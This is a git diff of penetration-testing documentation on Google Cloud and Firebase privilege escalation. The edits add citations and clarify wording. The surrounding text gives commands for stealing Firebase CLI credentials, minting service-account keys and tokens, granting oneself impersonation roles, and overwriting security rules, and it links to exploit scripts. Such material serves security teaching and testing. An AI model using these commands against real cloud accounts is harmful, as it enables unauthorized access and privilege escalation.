-An attacker does not need specific Firebase permissions to carry out this attack, but they do need access to the developer’s local system or to the Firebase CLI credentials file. These credentials are stored in a JSON file located at:
+An attacker does not need specific Firebase permissions to carry out this attack, but they do need access to the developer’s local system or to the Firebase CLI credentials file. These credentials are stored in a JSON file located at:<sup>[[35]](#references)[[36]](#references)[[37]](#references)</sup>
 
 - Linux/macOS: ~/.config/configstore/firebase-tools.json
 
 - Windows: C:\Users\[User]\.config\configstore\firebase-tools.json
 
-This file contains authentication tokens, including the refresh_token and access_token, which allow the attacker to authenticate as the user who originally ran firebase login.
+This file contains authentication tokens, including the refresh_token and access_token, which allow the attacker to authenticate as the user who originally ran firebase login.<sup>[[36]](#references)[[37]](#references)</sup>
 
-The attacker gains access to the Firebase CLI credentials file. They can then copy the entire file to their own system, and the Firebase CLI will automatically use the credentials from its default location. After doing so, the attacker can view all Firebase projects accessible to that user.
+The attacker gains access to the Firebase CLI credentials file. They can then copy the entire file to their own system, and the Firebase CLI will automatically use the credentials from its default location. After doing so, the attacker can view all Firebase projects accessible to that user.<sup>[[35]](#references)[[36]](#references)</sup>
 ```bash
 firebase projects:list
 ```
 
+## References
+
+- [1] [Firebase Realtime Database Security Rules Reference](https://firebase.google.com/docs/reference/security/database/)
+- [2] [Understand Firebase projects](https://firebase.google.com/docs/projects/learn-more)
+- [3] [Firebase Database REST API](https://firebase.google.com/docs/reference/rest/database/)
+- [4] [Saving Data](https://firebase.google.com/docs/database/rest/save-data)
+- [5] [Structuring Cloud Firestore Security Rules](https://firebase.google.com/docs/firestore/security/rules-structure)
+- [6] [Use the Cloud Firestore REST API](https://firebase.google.com/docs/firestore/use-rest-api)
+- [7] [Firebase Security Rules for Cloud Storage Reference](https://firebase.google.com/docs/reference/security/storage)
+- [8] [List files with Cloud Storage for Firebase on Web](https://firebase.google.com/docs/storage/web/list-files)
+- [9] [Download files with Cloud Storage for Firebase on Web](https://firebase.google.com/docs/storage/web/download-files)
+- [10] [Cloud Storage JSON API: Objects: list](https://docs.cloud.google.com/storage/docs/json_api/v1/objects/list)
+- [11] [Cloud Storage JSON API: Objects: insert](https://docs.cloud.google.com/storage/docs/json_api/v1/objects/insert)
+- [12] [Cloud Storage JSON API: Objects: delete](https://docs.cloud.google.com/storage/docs/json_api/v1/objects/delete)
+- [13] [Call functions via HTTP requests](https://firebase.google.com/docs/functions/http-events)
+- [14] [Call functions from your app](https://firebase.google.com/docs/functions/callable)
+- [15] [Cloud Functions IAM roles](https://docs.cloud.google.com/functions/docs/reference/iam/roles)
+- [16] [Serve dynamic content and host microservices with Cloud Functions](https://firebase.google.com/docs/hosting/functions)
+- [17] [Understand Firebase API Keys](https://firebase.google.com/docs/projects/api-keys)
+- [18] [Firebase Authentication REST API](https://firebase.google.com/docs/reference/rest/auth)
+- [19] [Enable or disable email enumeration protection](https://docs.cloud.google.com/identity-platform/docs/admin/email-enumeration-protection)
+- [20] [Password authentication](https://firebase.google.com/docs/auth/android/password-auth)
+- [21] [Firebase Authentication Limits](https://firebase.google.com/docs/auth/limits)
+- [22] [Manage Users](https://firebase.google.com/docs/auth/admin/manage-users)
+- [23] [Firebase Admin Python Auth API](https://firebase.google.com/docs/reference/admin/python/firebase_admin.auth)
+- [24] [Firebase Authentication roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/firebaseauth)
+- [25] [Firebase roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/firebase)
+- [26] [Add the Firebase Admin SDK to your server](https://firebase.google.com/docs/admin/setup)
+- [27] [Firebase Security Rules REST API](https://firebase.google.com/docs/reference/rules/rest)
+- [28] [Firebase Security Rules roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/firebaserules)
+- [29] [Firebase Realtime Database roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/firebasedatabase)
+- [30] [Cloud Firestore TTL policies](https://docs.cloud.google.com/firestore/native/docs/ttl)
+- [31] [Export and import data](https://docs.cloud.google.com/firestore/native/docs/manage-data/export-import)
+- [32] [gcloud firestore bulk-delete](https://docs.cloud.google.com/sdk/gcloud/reference/firestore/bulk-delete)
+- [33] [Cloud Firestore backups](https://docs.cloud.google.com/firestore/native/docs/backups)
+- [34] [Cloud Firestore roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/firestore)
+- [35] [Firebase CLI reference](https://firebase.google.com/docs/cli)
+- [36] [Firebase CLI auth source](https://github.com/firebase/firebase-tools/blob/main/src/auth.ts)
+- [37] [configstore](https://www.npmjs.com/package/configstore)
+- [38] [Authorize access with IAM](https://docs.cloud.google.com/functions/docs/securing/managing-access-iam)
+- [39] [Cloud Storage for Firebase API](https://firebase.google.com/docs/reference/rest/storage/rest)
+- [40] [Handle errors for Cloud Storage on Web](https://firebase.google.com/docs/storage/web/handle-errors)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
@@ -289,7 +289,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
     }
   }'
 ```
-The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:<sup>[[27]](#references)</sup>
+Use the returned `projects/<project-id>/rulesets/<ruleset-id>` name to update the Firestore release with a PATCH request:<sup>[[27]](#references)</sup>
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/cloud.firestore" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -315,7 +315,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
     }
   }'
 ```
-The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:<sup>[[27]](#references)</sup>
+Use the returned ruleset name to update the Cloud Storage release with a PATCH request:<sup>[[27]](#references)</sup>
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/firebase.storage/<bucket-id>" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
@@ -1,7 +1,5 @@
 # GCP - IAM Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## IAM
 
 Find more information about IAM in:
@@ -12,20 +10,20 @@ Find more information about IAM in:
 
 ### `iam.roles.update` (`iam.roles.get`)
 
-An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like:
+If a principal can update a custom role assigned to it, it can add permissions to that role and inherit access to other resources. The IAM API documents `iam.roles.update` for changing a custom role definition, while the original research demonstrates using that change to add a privilege to the caller's assigned role.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 gcloud iam roles update <rol name> --project <project> --add-permissions <permission>
 ```
 
-You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[18]](#references)</sup>
 
 ```bash
 gcloud iam roles update <Rol_NAME> --project <PROJECT_ID> --add-permissions <Permission>
 ```
 
 ### `iam.roles.create` & `iam.serviceAccounts.setIamPolicy`
-The iam.roles.create permission allows the creation of custom roles in a project/organization. In the hands of an attacker, this is dangerous because it enables them to define new sets of permissions that can later be assigned to entities (for example, using the iam.serviceAccounts.setIamPolicy permission) with the goal of escalating privileges.
+The `iam.roles.create` permission allows creating custom roles at project or organization scope. In the hands of an attacker, this is dangerous because it enables defining a permission set that can later be granted to a principal—for example, by setting a service account IAM policy—with the goal of escalating privileges.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 gcloud iam roles create <ROLE_ID> \
@@ -37,7 +35,7 @@ gcloud iam roles create <ROLE_ID> \
 
 ### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`)
 
-An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
+The `iam.serviceAccounts.getAccessToken` permission authorizes requesting an OAuth access token for a service account. If the target service account has more privileges than the caller, the token can be used to act with those privileges; `iam.serviceAccounts.get` may additionally be needed to discover or inspect the account, depending on the workflow.<sup>[[1]](#references)[[2]](#references)[[8]](#references)[[9]](#references)</sup>
 
 For a **resource-driven** variant where attacker-controlled code steals a **managed Vertex AI Agent Engine runtime token** from the metadata service and reuses it as the Vertex AI service agent, check:
 
@@ -50,11 +48,11 @@ gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccoun
   auth print-access-token
 ```
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ### `iam.serviceAccountKeys.create`
 
-An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
+An attacker with `iam.serviceAccountKeys.create` can **create a user-managed key for a service account**. The private key is returned only when the key is created and can then be used to authenticate to Google Cloud as that service account.<sup>[[1]](#references)[[2]](#references)[[10]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json
@@ -62,17 +60,19 @@ gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json
 gcloud auth activate-service-account --key-file=sa_cred.json
 ```
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+Use the actual output path from the first command (for example, /tmp/key.json) as the --key-file value when activating the account.<sup>[[11]](#references)[[12]](#references)</sup>
 
-Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permissions `iam.serviceAccountKeys.create` is also needed.
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[21]](#references)[[22]](#references)</sup>
+
+Note that **`iam.serviceAccountKeys.update` is not a way to replace a key's private material**: the current keys API exposes create/upload, enable/disable, and delete operations rather than a general key-update operation. To replace key material, create or upload a new user-managed key, which requires `iam.serviceAccountKeys.create`.<sup>[[10]](#references)[[12]](#references)</sup>
 
 ### `iam.serviceAccounts.implicitDelegation`
 
-If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Service Account that has the **`iam.serviceAccounts.getAccessToken`** permission on a third Service Account, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
+If service account A has **`iam.serviceAccounts.implicitDelegation`** on service account B, and B has **`iam.serviceAccounts.getAccessToken`** on service account C, A can use the delegation chain to **create a token for C**. Google documents this as a programmatic `generateAccessToken()` flow; here is a diagram to help explain.<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
 
 ![GCP IAM implicit delegation diagram chaining Service Account A, B, and C permissions to obtain an access token](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png)
 
-Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly:
+The [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts) states that this advanced delegation use case is supported programmatically through [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken), so the token is requested through the API directly:<sup>[[2]](#references)[[8]](#references)[[15]](#references)</sup>
 
 ```bash
 curl -X POST \
@@ -85,44 +85,44 @@ curl -X POST \
     }'
 ```
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ### `iam.serviceAccounts.signBlob`
 
-An attacker with the mentioned permissions will be able to **sign of arbitrary payloads in GCP**. So it'll be possible to **create an unsigned JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
+An attacker with `iam.serviceAccounts.signBlob` can have Google sign arbitrary bytes with the service account's system-managed key. One abuse is to **create an unsigned JWT assertion and send it as a blob to get the JWT signed** by the target service account; the signed assertion can then be exchanged for an access token. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).<sup>[[1]](#references)[[2]](#references)[[13]](#references)[[26]](#references)</sup>
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[25]](#references)[[26]](#references)[[27]](#references)</sup>
 
 ### `iam.serviceAccounts.signJwt`
 
-An attacker with the mentioned permissions will be able to **sign well-formed JSON web tokens (JWTs)**. The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes.
+An attacker with `iam.serviceAccounts.signJwt` can have Google sign a **well-formed JSON web token (JWT)**. Unlike `signBlob`, which accepts arbitrary bytes, `signJwt` expects a JWT payload; this is easier for JWT-based flows but cannot sign arbitrary bytes.<sup>[[1]](#references)[[2]](#references)[[14]](#references)[[29]](#references)</sup>
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a Python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).<sup>[[1]](#references)[[28]](#references)[[29]](#references)</sup>
 
 ### `iam.serviceAccounts.setIamPolicy` <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a>
 
-An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA:
+An attacker with `iam.serviceAccounts.setIamPolicy` can **add IAM policy bindings to a service account** and **grant itself** the permissions needed to impersonate that service account. In the following example we grant ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA; that role includes the token-creation permissions described above.<sup>[[2]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
     --member="user:username@domain.com" \
     --role="roles/iam.serviceAccountTokenCreator"
 
-# If you still have prblem grant yourself also this permission
-gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \
+# If you still have problems, grant yourself this permission as well
+gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
     --member="user:username@domain.com" \
     --role="roles/iam.serviceAccountUser"
 ```
 
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**<sup>[[30]](#references)</sup>
 
 ### `iam.serviceAccounts.actAs`
 
-The **iam.serviceAccounts.actAs permission** is like the **iam:PassRole permission from AWS**. It's essential for executing tasks, like initiating a Compute Engine instance, as it grants the ability to "actAs" a Service Account, ensuring secure permission management. Without this, users might gain undue access. Additionally, exploiting the **iam.serviceAccounts.actAs** involves various methods, each requiring a set of permissions, contrasting with other methods that need just one.
+The **`iam.serviceAccounts.actAs` permission** is conceptually similar to the **`iam:PassRole` permission from AWS**: it lets a principal attach a service account to a resource. Creating the resource still requires that service's own permissions, and jobs launched on the resource run as the attached service account. Exploiting **`iam.serviceAccounts.actAs`** therefore involves methods that require a set of permissions, contrasting with paths that need only one IAM permission.<sup>[[1]](#references)[[2]](#references)</sup>
 
 #### Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
 
-Impersonating a service account can be very useful to **obtain new and better privileges**. There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):
+Impersonating a service account can be very useful to **obtain new and better privileges**, because requests are authorized with the service account's permissions.<sup>[[2]](#references)[[15]](#references)</sup> There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):
 
 - Authentication **using RSA private keys** (covered above)
 - Authorization **using Cloud IAM policies** (covered here)
@@ -130,9 +130,9 @@ Impersonating a service account can be very useful to **obtain new and better pr
 
 ### `iam.serviceAccounts.getOpenIdToken`
 
-An attacker with the mentioned permissions will be able to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
+An attacker with `iam.serviceAccounts.getOpenIdToken` can generate a Google-signed OpenID Connect (OIDC) JWT. These tokens assert the service account's identity and audience; they do not by themselves grant authorization to a target resource.<sup>[[2]](#references)[[16]](#references)</sup>
 
-According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT.
+The token must include an **audience** identifying the service where it will be presented, and Google signs the resulting JWT with the service account identity. The linked [**post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b) provides an additional worked example.<sup>[[2]](#references)[[16]](#references)</sup>
 
 You can generate an OpenIDToken (if you have the access) with:
 
@@ -149,18 +149,46 @@ Then you can just use it to access the service with:
 curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
 ```
 
-Some services that support authentication via this kind of tokens are:
+Google documents Google-signed ID tokens for authenticating to services including Cloud Run, Cloud Run functions, Identity-Aware Proxy, and Cloud Endpoints:<sup>[[16]](#references)</sup>
 
 - [Google Cloud Run](https://cloud.google.com/run/)
 - [Google Cloud Functions](https://cloud.google.com/functions/docs/)
 - [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
 - [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
 
-You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
+You can find an example on how to create an OpenID token on behalf of a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py); Google's current ID-token guide documents the supported API and CLI flows.<sup>[[16]](#references)[[17]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform – Part 1 (IAM) | Rhino Security Labs](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Roles for service account authentication | Google Cloud Documentation](https://cloud.google.com/iam/docs/service-account-permissions)
+- [3] [Create and manage custom roles | Google Cloud Documentation](https://cloud.google.com/iam/docs/creating-custom-roles)
+- [4] [gcloud iam roles update | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/iam/roles/update)
+- [5] [gcloud iam roles create | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/iam/roles/create)
+- [6] [Method: projects.serviceAccounts.setIamPolicy | IAM REST API](https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts/setIamPolicy)
+- [7] [gcloud iam service-accounts add-iam-policy-binding | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/add-iam-policy-binding)
+- [8] [Method: projects.serviceAccounts.generateAccessToken | IAM Credentials API](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken)
+- [9] [gcloud auth print-access-token | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/print-access-token)
+- [10] [Method: projects.serviceAccounts.keys.create | IAM REST API](https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts.keys/create)
+- [11] [gcloud iam service-accounts keys create | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/keys/create)
+- [12] [REST Resource: projects.serviceAccounts.keys | IAM REST API](https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts.keys)
+- [13] [Method: projects.serviceAccounts.signBlob | IAM Credentials API](https://cloud.google.com/iam/docs/reference/credentials/rest/v1/projects.serviceAccounts/signBlob)
+- [14] [Method: projects.serviceAccounts.signJwt | IAM Credentials API](https://cloud.google.com/iam/docs/reference/credentials/rest/v1/projects.serviceAccounts/signJwt)
+- [15] [Service accounts overview | Google Cloud Documentation](https://cloud.google.com/iam/docs/understanding-service-accounts)
+- [16] [Get an ID token | Google Cloud Documentation](https://cloud.google.com/docs/authentication/get-id-token)
+- [17] [gcloud auth print-identity-token | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/print-identity-token)
+- [18] [iam.roles.update.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py)
+- [19] [4-iam.serviceAccounts.getAccessToken.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh)
+- [20] [iam.serviceAccounts.getAccessToken.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py)
+- [21] [3-iam.serviceAccountKeys.create.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh)
+- [22] [iam.serviceAccountKeys.create.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py)
+- [23] [5-iam.serviceAccounts.implicitDelegation.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh)
+- [24] [iam.serviceAccounts.implicitDelegation.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py)
+- [25] [6-iam.serviceAccounts.signBlob.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh)
+- [26] [iam.serviceAccounts.signBlob-accessToken.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py)
+- [27] [iam.serviceAccounts.signBlob-gcsSignedUrl.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py)
+- [28] [7-iam.serviceAccounts.signJWT.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh)
+- [29] [iam.serviceAccounts.signJWT.py | Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py)
+- [30] [d-iam.serviceAccounts.setIamPolicy.sh | gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
@@ -1,7 +1,5 @@
 # GCP - KMS Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## KMS
 
 Info about KMS:
@@ -10,16 +8,29 @@ Info about KMS:
 ../gcp-services/gcp-kms-enum.md
 {{#endref}}
 
-Note that in KMS the **permission** are not only **inherited** from Orgs, Folders and Projects but also from **Keyrings**.
+Note that in KMS the **permissions** are inherited not only from Orgs, Folders, and Projects but also from **Keyrings**.<sup>[[1]](#references)</sup>
 
 ### `cloudkms.cryptoKeyVersions.useToDecrypt`
 
-You can use this permission to **decrypt information with the key** you have this permission over.
+You can use this permission to **decrypt information with the key** you have this permission over.<sup>[[2]](#references)[[9]](#references)[[11]](#references)</sup>
 
 <details><summary>Decrypt data using KMS key</summary>
 
+For symmetric encryption, `gcloud kms decrypt` detects the key version from the ciphertext and does not accept `--version`.<sup>[[3]](#references)</sup>
+
 ```bash
 gcloud kms decrypt \
+    --location=[LOCATION] \
